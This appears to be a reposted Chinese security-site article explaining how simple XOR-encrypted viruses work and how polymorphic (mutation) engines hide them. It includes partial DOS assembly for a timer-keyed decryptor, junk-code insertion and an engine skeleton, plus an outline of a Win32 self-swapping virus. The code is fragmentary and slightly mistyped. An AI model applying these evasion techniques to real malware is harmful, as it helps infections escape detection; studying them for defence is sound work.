标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-248]   作者: ecawen 发表于: [2017-08-06]

本文共 [496] 位读者顶过

病毒由无加密到简单加密发展到变形病毒. 
早期的简单加密病毒工作范例如下: [出自:jiwo.org]
@entry: 
call @1 
@1: pop bp 
lea di,[bp+@3-@1] 
@2: xor byte ptr cs:[di],0 
@key = $-1 
inc di 
loop @2 
@3: ... ;病毒的主要代码 
@4: ;这里假设,es:di指向用于储存加密后代码的缓冲区 
mov cx,@end-@entry 
lea si,[bp+@entry-@1] 
push ds 
push cs 
pop ds 
in al,41h 
mov byte ptr [@key],al ;可将由41h端口读入的timer作为key 
rep movsb 
lea si,[di+@3-entry] 
mov cx,@end-entry 
@5: xor byte ptr es:[si],al 
inc si 
loop @5 
... 
@end: 
用一个简单的xor操作,以timer值作为KEY对代码进行加密.由此病毒的主体 
可能有256种变化,用一个更长的KEY可以得到更多的变化.但是用于解密的代码却 
是不变的,这是简单加密病毒的弱点. 
看看以下这个稍作修改的例子: 
@entry: 
call @1 
@1: mov ax,12h 
pop bp 
sub ax,cx 
lea di,[bp+@3-@1] 
@2: add ax,bx 
xor bype ptr cs:[di],0 
@key =$-1 
jnz $+2 
inc di 
mov ax,[12h] 
loop @2 
@3: 
... 
它和上面的例子功能是一样的,但看上去却是不同的代码.这就是变形病毒的 
关键:产生一些无用的代码夹在解密的代码中,使得每次的解密代码看上去是不一 
样的. 
选择垃圾代码的原则:1.不会破坏有用的REGISTER;2.不改变MEMORY的内容; 
3.解密代码要用FLAGS时也不能改变FLAGS.上面的例子中只需遵循1,2. 
一个由普通病毒改为变形病毒的例子如下: 
VirusEntry: 
... 
infect: 
.286c 
push offset VirusEntry 
push offset buffer 
call Encrypt ;encrypt virus to buffer 
... ;merge buffer to executable file 
Encrypt proc near 
decrypt:db sizeof(call $+5),rawcode(call $+5) ;定义如下, 
db sizeof(pop bp),rawcode(pop bp) ;一条代码的长度 
;代码的机器码 
... 
db 0 
;repeat 
;generate junk code and write buffer 
;wirte one decrypt code to buffer 
;untile all decrypt code has been written 
;encrypt virus and wirte buffer 
ret 
endp 
一个变形引擎可以用于任何病毒源码,使它成为一个 
变形病毒.这就是变形引擎的工作原理. 

Win32中将病毒分为三块:
startup code:得到API入口地址,搜索未感染文件,并调用infect 
code进行感染。读出已感染文件的病毒体,并调用evolution code
infect code:感染文件
evolotion code:随机读入病毒体中的某一块,并用于替代本病毒的
相应模块。
定义以下的结构用于evolution code
startuprva dd ? ;startup相对病毒开始位置的偏移
startuplen dd ? ;startup的长度
infectrva dd ?
infectlen dd ?
evolutionrva dd ?
evolutionlen dd ?
由于要进行交换,病毒没有加密。只要遵循一定的规则编写一系列的
evolution病毒,它将在感染过程中不断地改变。

评论

暂无
发表评论
 返回顶部 
热度(496)
 关注微信